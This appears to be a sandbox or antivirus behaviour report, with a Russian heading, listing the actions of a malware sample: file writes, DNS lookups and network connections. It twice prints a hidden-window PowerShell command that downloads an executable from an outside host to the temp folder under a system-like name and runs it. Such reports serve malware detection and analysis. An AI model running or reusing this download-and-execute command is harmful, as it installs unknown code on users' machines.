Техническая информация
- https://d.filebox.moe/vxeoqg.exe как %temp%\\msdlls.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://d.filebox.moe/vxeoqg.exe','%TEMP%\\MSdlls.exe') & %TEMP%\\MSdlls.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- 'd.###ebox.moe':443
- 'x2.#.lencr.org':80
- 'x1.#.lencr.org':80
- http://x2.#.lencr.org/
- http://x1.#.lencr.org/
- 'd.###ebox.moe':443
- DNS ASK d.###ebox.moe
- DNS ASK x2.#.lencr.org
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://d.filebox.moe/vxeoqg.exe','%TEMP%\\MSdlls.exe') & %TEMP%\\MSdlls.exe' (со скрытым окном)